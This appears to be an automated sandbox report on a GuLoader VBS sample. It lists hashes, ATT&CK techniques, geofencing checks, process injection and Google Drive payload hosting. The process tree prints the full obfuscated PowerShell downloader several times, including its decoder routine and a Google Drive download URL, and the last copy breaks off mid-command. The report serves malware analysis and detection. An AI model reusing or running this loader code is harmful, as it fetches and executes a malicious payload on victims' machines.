guloader | ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b

General

Target

ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs
Size

32KB
MD5

e198fb2a66ebacac2d2a06c6d39b578c
SHA1

ac1353658fffdfba77beaa6ce1c42254ba02346f
SHA256

ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b
SHA512

4c28d4eee277d495d2596eeab0841933ac84f5f72b12f64d9281b4023f7e9c32f22d2368bb634252fdcac4f2b79b5cfe32cdbff015f4dc8a2c6f6acdb1317fe5
SSDEEP

384:3PA0Xp74bQBupq5CMat1f9wxdaW+e9FfXpcHIBSi8g:/bFsq5CHePaWB9FfXp9Si8g

Score

10^/10

guloader discovery downloader execution

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	4700	WScript.exe
16	1980	powershell.exe
18	1980	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1980	powershell.exe
740	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	drive.google.com
16	drive.google.com
30	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1652	wabmig.exe
1652	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
740	powershell.exe
1652	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 740 set thread context of 1652	740	powershell.exe	95

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1980	powershell.exe
1980	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
740	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	740	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1652	wabmig.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 4700 wrote to memory of 1980	4700	WScript.exe	82
PID 4700 wrote to memory of 1980	4700	WScript.exe	82
PID 1980 wrote to memory of 2204	1980	powershell.exe	84
PID 1980 wrote to memory of 2204	1980	powershell.exe	84
PID 1980 wrote to memory of 1076	1980	powershell.exe	89
PID 1980 wrote to memory of 1076	1980	powershell.exe	89
PID 1076 wrote to memory of 740	1076	cmd.exe	90
PID 1076 wrote to memory of 740	1076	cmd.exe	90
PID 1076 wrote to memory of 740	1076	cmd.exe	90
PID 740 wrote to memory of 644	740	powershell.exe	92
PID 740 wrote to memory of 644	740	powershell.exe	92
PID 740 wrote to memory of 644	740	powershell.exe	92
PID 740 wrote to memory of 1652	740	powershell.exe	95
PID 740 wrote to memory of 1652	740	powershell.exe	95
PID 740 wrote to memory of 1652	740	powershell.exe	95
PID 740 wrote to memory of 1652	740	powershell.exe	95
PID 740 wrote to memory of 1652	740	powershell.exe	95

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"
    3⤵
    PID:2204
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi ');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1076
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl 